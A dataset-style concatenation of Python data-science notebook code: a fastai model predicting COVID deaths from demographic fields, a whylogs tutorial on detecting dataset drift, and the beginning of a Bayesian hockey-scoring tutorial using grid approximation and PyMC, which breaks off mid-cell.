with pd.option_context("display.max_rows", 1000, "display.max_columns", 1000):
display(df)
display_all(train.describe())
procs = [FillMissing, Categorify, Normalize]
dep_var = 'Death'
cat_names = ['DRIVERS' , 'PASSPORT', 'MARITAL', 'RACE', 'ETHNICITY',
'GENDER', 'COUNTY', 'PLACE_BIRTH']
PATH_data = PATH + 'Descriptive/'
#https://www.kaggle.com/dromosys/fast-ai-v1-focal-loss
from torch import nn
import torch.nn.functional as F
#Parameters of focal loss
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=5, logits=False, reduction='elementwise_mean'):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduction = reduction
def forward(self, inputs, targets):
if self.logits:
BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduction='none')
else:
BCE_loss = F.binary_cross_entropy(inputs, targets, reduction='none')
pt = torch.exp(-BCE_loss)
F_loss = self.alpha * (1-pt)**self.gamma * BCE_loss
if self.reduction is None:
return F_loss
else:
return torch.mean(F_loss)
# Setting random seed
SEED = 2019
def seed_everything(seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
#tf.set_random_seed(seed)
seed_everything(SEED)
def auroc_score(input, target):
input, target = input.cpu().numpy()[:,1], target.cpu().numpy()
return roc_auc_score(target, input)
class AUROC(Callback):
_order = -20 #Needs to run before the recorder
def __init__(self, learn, **kwargs): self.learn = learn
def on_train_begin(self, **kwargs): self.learn.recorder.add_metric_names(['AUROC'])
def on_epoch_begin(self, **kwargs): self.output, self.target = [], []
def on_batch_end(self, last_target, last_output, train, **kwargs):
if not train:
self.output.append(last_output)
self.target.append(last_target)
def on_epoch_end(self, last_metrics, **kwargs):
if len(self.output) > 0:
output = torch.cat(self.output)
target = torch.cat(self.target)
preds = F.softmax(output, dim=1)
metric = auroc_score(preds, target)
return add_metrics(last_metrics,[metric])
len(test)
#5 Fold cross-validation
nfold = 5
target = 'Death'
skf = KFold(n_splits=nfold, shuffle=True, random_state=2019)
oof = np.zeros(len(train))
predictions = np.zeros(len(test))
train['Death'].describe()
test.shape
dep_var
#Find Learning Rate
i = 1
cont_names = set(train) - set(cat_names) - {dep_var}
for train_index, valid_idx in skf.split(train, train.Death.values):
if i>1:
break
print("\nfold {}".format(i))
data= (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.lr_find()
learn.recorder.plot()
i=i+1
i = 1
lr = 1e-2
for train_index, valid_idx in skf.split(train, train.Death.values):
print("\nfold {}".format(i))
data = (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.add_test(TabularList.from_df(test, path=PATH_data, cat_names=cat_names, cont_names= cont_names))
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.fit_one_cycle(15, slice(lr), callbacks=[AUROC(learn),SaveModelCallback(learn, every='improvement',
monitor='valid_loss', name='bestmodel_death_fold{}'.format(i))],
wd=0.1)
learn.load('bestmodel_death_fold{}'.format(i))
interp = ClassificationInterpretation.from_learner(learn)
from sklearn import metrics
print(metrics.classification_report(interp.y_true.numpy(), interp.pred_class.numpy()))
preds_valid = learn.get_preds(ds_type=DatasetType.Valid)
predictions_v = []
for j in range(len(valid_idx)):
predictions_v.append(float(preds_valid[0][j][1].cpu().numpy()))
oof[valid_idx] = predictions_v
preds = learn.get_preds(ds_type=DatasetType.Test)
predictions_t = []
for j in range(test.shape[0]):
predictions_t.append(float(preds[0][j][1].cpu().numpy()))
predictions += predictions_t
i = i + 1
print("\n\nCV AUC: {:<0.5f}".format(metrics.roc_auc_score(train.Death.values.astype(bool), oof)))
print("\n\nCV log loss: {:<0.5f}".format(metrics.log_loss(train.Death.values.astype(bool), oof)))
print("\n\nCV Gini: {:<0.5f}".format(2 * metrics.roc_auc_score(train.Death.values.astype(bool), oof) -1))
#threshold optimization
maximum = 0
for i in range(1000):
f1 = metrics.f1_score(train.Death.values.astype(bool), oof >i*.001)
if f1 > maximum:
maximum=f1
threshold = i*0.001
print(f'Maximum f1 value: {maximum}' , f'Probability cutoff: {threshold}' )
print(metrics.classification_report(train.Death.values.astype(bool), oof >threshold))
pred = oof
#code from https://forums.fast.ai/t/feature-importance-in-deep-learning/42026/6
def feature_importance(learner, cat_names, cont_names):
# based on: https://medium.com/@mp.music93/neural-networks-feature-importance-with-fastai-5c393cf65815
loss0 = np.array([learner.loss_func(learner.pred_batch(batch=(x,y.to("cpu"))), y.to("cpu")) for x,y in iter(learner.data.valid_dl)]).mean()
fi = dict()
types = [cat_names, cont_names]
for j, t in enumerate(types):
for i, c in enumerate(t):
loss = []
for x,y in iter(learner.data.valid_dl):
col = x[j][:,i] #x[0] da hier cat-vars
idx = torch.randperm(col.nelement())
x[j][:,i] = col.view(-1)[idx].view(col.size())
y = y.to('cpu')
loss.append(learner.loss_func(learner.pred_batch(batch=(x,y)), y))
fi[c] = np.array(loss).mean()-loss0
d = sorted(fi.items(), key = lambda kv: kv[1], reverse = True)
return pd.DataFrame({'cols': [l for l, v in d], 'imp': np.log1p([v for l, v in d])})
imp = feature_importance(learn, cat_names, cont_names)
imp[:20].plot.barh(x="cols", y="imp", figsize=(10, 10))
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
fpr_rf, tpr_rf, _ = roc_curve(train.Death.values.astype(bool), oof)
plt.figure(1)
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_rf, tpr_rf, label='RF')
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve')
plt.legend(loc='best')
plt.show()
sub_df = pd.read_csv(PATH + 'Descriptive/test.csv')
sub_df["Death"] = predictions/nfold
nocovid["COVID_flag"] = 0
sub_df = sub_df.merge(nocovid, how='left', left_on ='Id', right_on ='Id')
sub_df['COVID_flag'] = sub_df['COVID_flag'].fillna(1)
#If no covid all probabilities 0
sub_df["Death"] = sub_df["Death"] * sub_df['COVID_flag']
sub_df[['Id', 'Death']].to_csv("NN_Death_status.csv", index=False, line_terminator='\n', header=False)
np.mean(sub_df["Death"]/nfold)
| 0.792665 | 0.664282 |
# Detecting Dataset Drift with whylogs
We will be using data from Kaggle (https://www.kaggle.com/yugagrawal95/sample-media-spends-data) that is packaged with this notebook.
```
%matplotlib inline
import datetime
import math
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from whylogs import get_or_create_session
# Read our Media Spend dataset as Pandas dataframe
data = pd.read_csv("MediaSpendDataset.csv",
parse_dates=["Calendar_Week"], infer_datetime_format=True)
data
```
As we can see here, we have advertising and media impressions and views per week for a number of marketing campaigns for some unknown company. Included with this information is sales against those spends.
## Exploratory Data Analysis
Let's now explore the dataset; we have very little metadata or context.
```
data.groupby("Calendar_Week").count().T
data.groupby("Division").count().T
```
We see that the *Z* division has double the entries than the other divisions.
```
fig, ax = plt.subplots(figsize=(10, 3))
sns.lineplot(x="Calendar_Week", y="Sales", data=data, ax=ax)
fig, ax = plt.subplots(figsize=(10, 3))
sns.scatterplot(x="Google_Impressions", y="Sales", data=data, ax=ax)
```
Let's compare the data from the first month to the last month, which happens to capture differences in transactions prior to and during the COVID-19 global pandemic.
## Profiling with whylogs
```
model_date = datetime.datetime(2020, 1, 1)
training_data = data[data["Calendar_Week"] < model_date]
test_data = data[data["Calendar_Week"] >= model_date]
session = get_or_create_session()
profiles = []
profiles.append(session.log_dataframe(training_data, dataset_timestamp=model_date))
profiles.append(session.log_dataframe(test_data, dataset_timestamp=datetime.datetime.now()))
profiles
```
We can compare the data we'll use for training with that in early 2020.
```
# Training data profile summary
training_summary = profiles[0].flat_summary()["summary"]
training_summary
# Test data profile summary
test_summary = profiles[1].flat_summary()["summary"]
test_summary
```
## Dataset Drift in whylogs Data
We need to understand how the data changes between that used in training and test data. To do so, let's first view one of the many objects in the dataset profile provided by whylogs, a histogram for each feature tracked. We can then inspect the **Overall_Views** feature.
```
training_histograms = profiles[0].flat_summary()["hist"]
test_histograms = profiles[1].flat_summary()["hist"]
test_histograms["Overall_Views"]
```
While we plan to integrate convienient dataset shift visualization and analysis API soon, you are always able to access the attributes you need.
We will first define a custom range and bins, then utilize our access to the data sketches' probability mass function. We then visualize these values using Seaborn.
```
def get_custom_histogram_info(variable, n_bins):
min_range = min(training_summary[training_summary["column"]==variable]["min"].values[0],
test_summary[test_summary["column"]==variable]["min"].values[0])
max_range = max(training_summary[training_summary["column"]==variable]["max"].values[0],
test_summary[test_summary["column"]==variable]["max"].values[0])
bins = range(int(min_range), int(max_range), int((max_range-min_range)/n_bins))
training_counts = np.array(
profiles[0].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
test_counts = np.array(
profiles[1].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
return bins, training_counts, test_counts
def plot_distribution_shift(variable, n_bins):
"""Visualization for distribution shift"""
bins, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
fig, ax = plt.subplots(figsize=(10, 3))
sns.histplot(x=bins, weights=training_counts, bins=n_bins,
label="Training data", color="teal", alpha=0.7, ax=ax)
sns.histplot(x=bins, weights=test_counts, bins=n_bins,
label="Test data", color="gold", alpha=0.7, ax=ax)
ax.legend()
plt.show()
plot_distribution_shift("Overall_Views", n_bins=60)
```
While it is quite clear that the distribution in this case differs between the training and test dataset, we will likely need a quantitative measure. You can also use whylogs histogram metrics to calculate dataset shift using a number of metrics: Population Stability Index (PSI), Kolmogorov-Smirnov statistic, Kullback-Lebler divergence (or other f-divergences), and histogram intersection.
## Kullback-Lebler divergence
This score, often shortened to K-L divergence, is measure of how one probability distribution is different from a second, reference probability distribution. The K-L divergence can be interpreted as the average difference of the number of bits required for encoding samples of one distribution (*P*) using a code optimized for another (*Q*) rather than one optimized for *P*. KL divergence is not a true statistical metric of spread as it is not symmetric and does not satisfy the triangle inequality.
However, this value has become quite poplular and easy to calculate in Python. We'll use the implementation in `scikit-learn`.
```
from sklearn.metrics import mutual_info_score
def calculate_kl_divergence(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
return mutual_info_score(training_counts, test_counts)
calculate_kl_divergence("Overall_Views", n_bins=60)
```
## Histogram intersection metric
Our second metric is the histogram intersection score, which is an intuitive metric that measures the area of overlap between the two probability distributions. A histogram intersection score of 0.0 represents no overlap while a score of 1.0 represents identical distributions. This score requires discretized probability distributions and depends heavily on the choice of bin size and scale used.
```
def calculate_histogram_intersection(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
result = 0
for i in range(n_bins):
result += min(training_counts[i], test_counts[i])
return result
calculate_histogram_intersection("Overall_Views", n_bins=60)
calculate_histogram_intersection("Sales", n_bins=60)
```
|
github_jupyter
|
%matplotlib inline
import datetime
import math
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from whylogs import get_or_create_session
# Read our Media Spend dataset as Pandas dataframe
data = pd.read_csv("MediaSpendDataset.csv",
parse_dates=["Calendar_Week"], infer_datetime_format=True)
data
data.groupby("Calendar_Week").count().T
data.groupby("Division").count().T
fig, ax = plt.subplots(figsize=(10, 3))
sns.lineplot(x="Calendar_Week", y="Sales", data=data, ax=ax)
fig, ax = plt.subplots(figsize=(10, 3))
sns.scatterplot(x="Google_Impressions", y="Sales", data=data, ax=ax)
model_date = datetime.datetime(2020, 1, 1)
training_data = data[data["Calendar_Week"] < model_date]
test_data = data[data["Calendar_Week"] >= model_date]
session = get_or_create_session()
profiles = []
profiles.append(session.log_dataframe(training_data, dataset_timestamp=model_date))
profiles.append(session.log_dataframe(test_data, dataset_timestamp=datetime.datetime.now()))
profiles
# Training data profile summary
training_summary = profiles[0].flat_summary()["summary"]
training_summary
# Test data profile summary
test_summary = profiles[1].flat_summary()["summary"]
test_summary
training_histograms = profiles[0].flat_summary()["hist"]
test_histograms = profiles[1].flat_summary()["hist"]
test_histograms["Overall_Views"]
def get_custom_histogram_info(variable, n_bins):
min_range = min(training_summary[training_summary["column"]==variable]["min"].values[0],
test_summary[test_summary["column"]==variable]["min"].values[0])
max_range = max(training_summary[training_summary["column"]==variable]["max"].values[0],
test_summary[test_summary["column"]==variable]["max"].values[0])
bins = range(int(min_range), int(max_range), int((max_range-min_range)/n_bins))
training_counts = np.array(
profiles[0].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
test_counts = np.array(
profiles[1].columns[variable].number_tracker.histogram.get_pmf(bins[:-1]))
return bins, training_counts, test_counts
def plot_distribution_shift(variable, n_bins):
"""Visualization for distribution shift"""
bins, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
fig, ax = plt.subplots(figsize=(10, 3))
sns.histplot(x=bins, weights=training_counts, bins=n_bins,
label="Training data", color="teal", alpha=0.7, ax=ax)
sns.histplot(x=bins, weights=test_counts, bins=n_bins,
label="Test data", color="gold", alpha=0.7, ax=ax)
ax.legend()
plt.show()
plot_distribution_shift("Overall_Views", n_bins=60)
from sklearn.metrics import mutual_info_score
def calculate_kl_divergence(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
return mutual_info_score(training_counts, test_counts)
calculate_kl_divergence("Overall_Views", n_bins=60)
def calculate_histogram_intersection(variable, n_bins):
_, training_counts, test_counts = get_custom_histogram_info(variable, n_bins)
result = 0
for i in range(n_bins):
result += min(training_counts[i], test_counts[i])
return result
calculate_histogram_intersection("Overall_Views", n_bins=60)
calculate_histogram_intersection("Sales", n_bins=60)
| 0.604866 | 0.964085 |
Bayesian Zig Zag
===
Developing probabilistic models using grid methods and MCMC.
Thanks to Chris Fonnesback for his help with this notebook, and to Colin Carroll, who added features to pymc3 to support some of these examples.
To install the most current version of pymc3 from source, run
```
pip3 install -U git+https://github.com/pymc-devs/pymc3.git
```
Copyright 2018 Allen Downey
MIT License: https://opensource.org/licenses/MIT
```
from __future__ import print_function, division
%matplotlib inline
%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'
import numpy as np
import pymc3 as pm
import matplotlib.pyplot as plt
```
## Simulating hockey
I'll model hockey as a Poisson process, where each team has some long-term average scoring rate, `lambda`, in goals per game.
For the first example, we'll assume that `lambda` is known (somehow) to be 2.7. Since regulation play (as opposed to overtime) is 60 minutes, we can compute the goal scoring rate per minute.
```
lam_per_game = 2.7
min_per_game = 60
lam_per_min = lam_per_game / min_per_game
lam_per_min, lam_per_min**2
```
If we assume that a goal is equally likely during any minute of the game, and we ignore the possibility of scoring more than one goal in the same minute, we can simulate a game by generating one random value each minute.
```
np.random.random(min_per_game)
```
If the random value is less than `lam_per_min`, that means we score a goal during that minute.
```
np.random.random(min_per_game) < lam_per_min
```
So we can get the number of goals scored by one team like this:
```
np.sum(np.random.random(min_per_game) < lam_per_min)
```
I'll wrap that in a function.
```
def half_game(lam_per_min, min_per_game=60):
return np.sum(np.random.random(min_per_game) < lam_per_min)
```
And simulate 10 games.
```
size = 10
sample = [half_game(lam_per_min) for i in range(size)]
```
If we simulate 1000 games, we can see what the distribution looks like. The average of this sample should be close to `lam_per_game`.
```
size = 1000
sample_sim = [half_game(lam_per_min) for i in range(size)]
np.mean(sample_sim), lam_per_game
```
## PMFs
To visualize distributions, I'll start with a probability mass function (PMF), which I'll implement using a `Counter`.
```
from collections import Counter
class Pmf(Counter):
def normalize(self):
"""Normalizes the PMF so the probabilities add to 1."""
total = sum(self.values())
for key in self:
self[key] /= total
def sorted_items(self):
"""Returns the outcomes and their probabilities."""
return zip(*sorted(self.items()))
```
Here are some functions for plotting PMFs.
```
plot_options = dict(linewidth=3, alpha=0.6)
def underride(options):
"""Add key-value pairs to d only if key is not in d.
options: dictionary
"""
for key, val in plot_options.items():
options.setdefault(key, val)
return options
def plot(xs, ys, **options):
"""Line plot with plot_options."""
plt.plot(xs, ys, **underride(options))
def bar(xs, ys, **options):
"""Bar plot with plot_options."""
plt.bar(xs, ys, **underride(options))
def plot_pmf(sample, **options):
"""Compute and plot a PMF."""
pmf = Pmf(sample)
pmf.normalize()
xs, ps = pmf.sorted_items()
bar(xs, ps, **options)
def pmf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('PMF')
plt.title('Distribution of goals scored')
legend()
def legend(**options):
"""Draw a legend only if there are labeled items.
"""
ax = plt.gca()
handles, labels = ax.get_legend_handles_labels()
if len(labels):
plt.legend(**options)
```
Here's what the results from the simulation look like.
```
plot_pmf(sample_sim, label='simulation')
pmf_goals()
```
## Analytic distributions
For the simulation we just did, we can figure out the distribution analytically: it's a binomial distribution with parameters `n` and `p`, where `n` is the number of minutes and `p` is the probability of scoring a goal during any minute.
We can use NumPy to generate a sample from a binomial distribution.
```
n = min_per_game
p = lam_per_min
sample_bin = np.random.binomial(n, p, size)
np.mean(sample_bin)
```
And confirm that the results are similar to what we got from the model.
```
plot_pmf(sample_sim, label='simulation')
plot_pmf(sample_bin, label='binomial')
pmf_goals()
```
But plotting PMFs is a bad way to compare distributions. It's better to use the cumulative distribution function (CDF).
```
def plot_cdf(sample, **options):
"""Compute and plot the CDF of a sample."""
pmf = Pmf(sample)
xs, freqs = pmf.sorted_items()
ps = np.cumsum(freqs, dtype=np.float)
ps /= ps[-1]
plot(xs, ps, **options)
def cdf_rates():
"""Decorate the axes."""
plt.xlabel('Goal scoring rate (mu)')
plt.ylabel('CDF')
plt.title('Distribution of goal scoring rate')
legend()
def cdf_goals():
"""Decorate the axes."""
plt.xlabel('Number of goals')
plt.ylabel('CDF')
plt.title('Distribution of goals scored')
legend()
def plot_cdfs(*sample_seq, **options):
"""Plot multiple CDFs."""
for sample in sample_seq:
plot_cdf(sample, **options)
cdf_goals()
```
Now we can compare the results from the simulation and the sample from the biomial distribution.
```
plot_cdf(sample_sim, label='simulation')
plot_cdf(sample_bin, label='binomial')
cdf_goals()
```
## Poisson process
For large values of `n`, the binomial distribution converges to the Poisson distribution with parameter `mu = n * p`, which is also `mu = lam_per_game`.
```
mu = lam_per_game
sample_poisson = np.random.poisson(mu, size)
np.mean(sample_poisson)
```
And we can confirm that the results are consistent with the simulation and the binomial distribution.
```
plot_cdfs(sample_sim, sample_bin)
plot_cdf(sample_poisson, label='poisson', linestyle='dashed')
legend()
```
## Warming up PyMC
Soon we will want to use `pymc3` to do inference, which is really what it's for. But just to get warmed up, I will use it to generate a sample from a Poisson distribution.
```
model = pm.Model()
with model:
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
len(trace['goals'])
sample_pm = trace['goals']
np.mean(sample_pm)
```
This example is like using a cannon to kill a fly. But it help us learn to use the cannon.
```
plot_cdfs(sample_sim, sample_bin, sample_poisson)
plot_cdf(sample_pm, label='poisson pymc', linestyle='dashed')
legend()
```
## Evaluating the Poisson distribution
One of the nice things about the Poisson distribution is that we can compute its CDF and PMF analytically. We can use the CDF to check, one more time, the previous results.
```
import scipy.stats as st
xs = np.arange(11)
ps = st.poisson.cdf(xs, mu)
plot_cdfs(sample_sim, sample_bin, sample_poisson, sample_pm)
plt.plot(xs, ps, label='analytic', linestyle='dashed')
legend()
```
And we can use the PMF to compute the probability of any given outcome. Here's what the analytic PMF looks like:
```
xs = np.arange(11)
ps = st.poisson.pmf(xs, mu)
bar(xs, ps, label='analytic PMF')
pmf_goals()
```
And here's a function that compute the probability of scoring a given number of goals in a game, for a known value of `mu`.
```
def poisson_likelihood(goals, mu):
"""Probability of goals given scoring rate.
goals: observed number of goals (scalar or sequence)
mu: hypothetical goals per game
returns: probability
"""
return np.prod(st.poisson.pmf(goals, mu))
```
Here's the probability of scoring 6 goals in a game if the long-term rate is 2.7 goals per game.
```
poisson_likelihood(goals=6, mu=2.7)
```
Here's the probability of scoring 3 goals.
```
poisson_likelihood(goals=3, mu=2.7)
```
This function also works with a sequence of goals, so we can compute the probability of scoring 6 goals in the first game and 3 in the second.
```
poisson_likelihood(goals=[6, 2], mu=2.7)
```
## Bayesian inference with grid approximation
Ok, it's finally time to do some inference! The function we just wrote computes the likelihood of the data, given a hypothetical value of `mu`:
$\mathrm{Prob}~(x ~|~ \mu)$
But what we really want is the distribution of `mu`, given the data:
$\mathrm{Prob}~(\mu ~|~ x)$
If only there were some theorem that relates these probabilities!
The following class implements Bayes's theorem.
```
class Suite(Pmf):
"""Represents a set of hypotheses and their probabilities."""
def bayes_update(self, data, like_func):
"""Perform a Bayesian update.
data: some representation of observed data
like_func: likelihood function that takes (data, hypo), where
hypo is the hypothetical value of some parameter,
and returns P(data | hypo)
"""
for hypo in self:
self[hypo] *= like_func(data, hypo)
self.normalize()
def plot(self, **options):
"""Plot the hypotheses and their probabilities."""
xs, ps = self.sorted_items()
plot(xs, ps, **options)
def pdf_rate():
"""Decorate the axes."""
plt.xlabel('Goals per game (mu)')
plt.ylabel('PDF')
plt.title('Distribution of goal scoring rate')
legend()
```
I'll start with a uniform prior just to keep things simple. We'll choose a better prior later.
```
hypo_mu = np.linspace(0, 20, num=51)
hypo_mu
```
Initially `suite` represents the prior distribution of `mu`.
```
suite = Suite(hypo_mu)
suite.normalize()
suite.plot(label='prior')
pdf_rate()
```
Now we can update it with the data and plot the posterior.
```
suite.bayes_update(data=6, like_func=poisson_likelihood)
suite.plot(label='posterior')
pdf_rate()
```
With a uniform prior, the posterior is the likelihood function, and the MAP is the value of `mu` that maximizes likelihood, which is the observed number of goals, 6.
This result is probably not reasonable, because the prior was not reasonable.
## A better prior
To construct a better prior, I'll use scores from previous Stanley Cup finals to estimate the parameters of a gamma distribution.
Why gamma? You'll see.
Here are (total goals)/(number of games) for both teams from 2013 to 2017, not including games that went into overtime.
```
xs = [13/6, 19/6, 8/4, 4/4, 10/6, 13/6, 2/2, 4/2, 5/3, 6/3]
```
If those values were sampled from a gamma distribution, we can estimate its parameters, `k` and `theta`.
```
def estimate_gamma_params(xs):
"""Estimate the parameters of a gamma distribution.
See https://en.wikipedia.org/wiki/Gamma_distribution#Parameter_estimation
"""
s = np.log(np.mean(xs)) - np.mean(np.log(xs))
k = (3 - s + np.sqrt((s-3)**2 + 24*s)) / 12 / s
theta = np.mean(xs) / k
alpha = k
beta = 1 / theta
return alpha, beta
```
Here are the estimates.
```
alpha, beta = estimate_gamma_params(xs)
print(alpha, beta)
```
The following function takes `alpha` and `beta` and returns a "frozen" distribution from SciPy's stats module:
```
def make_gamma_dist(alpha, beta):
"""Returns a frozen distribution with given parameters.
"""
return st.gamma(a=alpha, scale=1/beta)
```
The frozen distribution knows how to compute its mean and standard deviation:
```
dist = make_gamma_dist(alpha, beta)
print(dist.mean(), dist.std())
```
And it can compute its PDF.
```
hypo_mu = np.linspace(0, 10, num=101)
ps = dist.pdf(hypo_mu)
plot(hypo_mu, ps, label='gamma(9.6, 5.1)')
pdf_rate()
```
We can use `make_gamma_dist` to construct a prior suite with the given parameters.
```
def make_gamma_suite(xs, alpha, beta):
"""Makes a suite based on a gamma distribution.
xs: places to evaluate the PDF
alpha, beta: parameters of the distribution
returns: Suite
"""
dist = make_gamma_dist(alpha, beta)
ps = dist.pdf(xs)
prior = Suite(dict(zip(xs, ps)))
prior.normalize()
return prior
```
Here's what it looks like.
```
prior = make_gamma_suite(hypo_mu, alpha, beta)
prior.plot(label='gamma prior')
pdf_rate()
```
And we can update this prior using the observed data.
```
posterior = prior.copy()
posterior.bayes_update(data=6, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
pdf_rate()
```
The results are substantially different from what we got with the uniform prior.
```
suite.plot(label='posterior with uniform prior', color='gray')
posterior.plot(label='posterior with gamma prior', color=COLORS[1])
pdf_rate()
```
Suppose the same team plays again and scores 2 goals in the second game. We can perform a second update using the posterior from the first update as the prior for the second.
```
posterior2 = posterior.copy()
posterior2.bayes_update(data=2, like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
pdf_rate()
```
Or, starting with the original prior, we can update with both pieces of data at the same time.
```
posterior3 = prior.copy()
posterior3.bayes_update(data=[6, 2], like_func=poisson_likelihood)
prior.plot(label='prior')
posterior.plot(label='posterior')
posterior2.plot(label='posterior2')
posterior3.plot(label='posterior3', linestyle='dashed')
pdf_rate()
```
## Update using conjugate priors
I'm using a gamma distribution as a prior in part because it has a shape that seems credible based on what I know about hockey.
But it is also useful because it happens to be the conjugate prior of the Poisson distribution, which means that if the prior is gamma and we update with a Poisson likelihood function, the posterior is also gamma.
See https://en.wikipedia.org/wiki/Conjugate_prior#Discrete_distributions
And often we can compute the parameters of the posterior with very little computation. If we observe `x` goals in `1` game, the new parameters are `alpha+x` and `beta+1`.
```
class GammaSuite:
"""Represents a gamma conjugate prior/posterior."""
def __init__(self, alpha, beta):
"""Initialize.
alpha, beta: parameters
dist: frozen distribution from scipy.stats
"""
self.alpha = alpha
self.beta = beta
self.dist = make_gamma_dist(alpha, beta)
def plot(self, xs, **options):
"""Plot the suite.
xs: locations where we should evaluate the PDF.
"""
ps = self.dist.pdf(xs)
ps /= np.sum(ps)
plot(xs, ps, **options)
def bayes_update(self, data):
return GammaSuite(self.alpha+data, self.beta+1)
```
Here's what the prior looks like using a `GammaSuite`:
```
gamma_prior = GammaSuite(alpha, beta)
gamma_prior.plot(hypo_mu, label='prior')
pdf_rate()
gamma_prior.dist.mean()
```
And here's the posterior after one update.
```
gamma_posterior = gamma_prior.bayes_update(6)
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior')
pdf_rate()
gamma_posterior.dist.mean()
```
And we can confirm that the posterior we get using the conjugate prior is the same as the one we got using a grid approximation.
```
gamma_prior.plot(hypo_mu, label='prior')
gamma_posterior.plot(hypo_mu, label='posterior conjugate')
posterior.plot(label='posterior grid', linestyle='dashed')
pdf_rate()
```
## Posterior predictive distribution
Ok, let's get to what is usually the point of this whole exercise, making predictions.
The prior represents what we believe about the distribution of `mu` based on the data (and our prior beliefs).
Each value of `mu` is a possible goal scoring rate.
For a given value of `mu`, we can generate a distribution of goals scored in a particular game, which is Poisson.
But we don't have a given value of `mu`, we have a whole bunch of values for `mu`, with different probabilities.
So the posterior predictive distribution is a mixture of Poissons with different weights.
The simplest way to generate the posterior predictive distribution is to
1. Draw a random `mu` from the posterior distribution.
2. Draw a random number of goals from `Poisson(mu)`.
3. Repeat.
Here's a function that draws a sample from a posterior `Suite` (the grid approximation, not `GammaSuite`).
```
def sample_suite(suite, size):
"""Draw a random sample from a Suite
suite: Suite object
size: sample size
"""
xs, ps = zip(*suite.items())
return np.random.choice(xs, size, replace=True, p=ps)
```
Here's a sample of `mu` drawn from the posterior distribution (after one game).
```
size = 10000
sample_post = sample_suite(posterior, size)
np.mean(sample_post)
```
Here's what the posterior distribution looks like.
```
plot_cdf(sample_post, label='posterior sample')
cdf_rates()
```
Now for each value of `mu` in the posterior sample we draw one sample from `Poisson(mu)`
```
sample_post_pred = np.random.poisson(sample_post)
np.mean(sample_post_pred)
```
Here's what the posterior predictive distribution looks like.
```
plot_pmf(sample_post_pred, label='posterior predictive sample')
pmf_goals()
```
## Posterior prediction done wrong
The posterior predictive distribution represents uncertainty from two sources:
1. We don't know `mu`
2. Even if we knew `mu`, we would not know the score of the next game.
It is tempting, but wrong, to generate a posterior prediction by taking the mean of the posterior distribution and drawing samples from `Poisson(mu)` with just a single value of `mu`.
That's wrong because it eliminates one of our sources of uncertainty.
Here's an example:
```
mu_mean = np.mean(sample_post)
sample_post_pred_wrong = np.random.poisson(mu_mean, size)
np.mean(sample_post_pred_wrong)
```
Here's what the samples looks like:
```
plot_cdf(sample_post_pred, label='posterior predictive sample')
plot_cdf(sample_post_pred_wrong, label='incorrect posterior predictive')
cdf_goals()
```
In the incorrect predictive sample, low values and high values are slightly less likely.
The means are about the same:
```
print(np.mean(sample_post_pred), np.mean(sample_post_pred_wrong))
```
But the standard deviation of the incorrect distribution is lower.
```
print(np.std(sample_post_pred), np.std(sample_post_pred_wrong))
```
## Abusing PyMC
Ok, we are almost ready to use PyMC for its intended purpose, but first we are going to abuse it a little more.
Previously we used PyMC to draw a sample from a Poisson distribution with known `mu`.
Now we'll use it to draw a sample from the prior distribution of `mu`, with known `alpha` and `beta`.
We still have the values I estimated based on previous playoff finals:
```
print(alpha, beta)
```
Now we can draw a sample from the prior predictive distribution:
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
```
This might not be a sensible way to use PyMC. If we just want to sample from the prior predictive distribution, we could use NumPy or SciPy just as well. We're doing this to develop and test the model incrementally.
So let's see if the sample looks right.
```
sample_prior_pm = trace['mu']
np.mean(sample_prior_pm)
sample_prior = sample_suite(prior, 2000)
np.mean(sample_prior)
plot_cdf(sample_prior, label='prior')
plot_cdf(sample_prior_pm, label='prior pymc')
cdf_rates()
```
It looks pretty good (although not actually as close as I expected).
Now let's extend the model to sample from the prior predictive distribution. This is still a silly way to do it, but it is one more step toward inference.
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample_prior_predictive(2000)
```
Let's see how the results compare with a sample from the prior predictive distribution, generated by plain old NumPy.
```
sample_prior_pred_pm = trace['goals'].flatten()
np.mean(sample_prior_pred_pm)
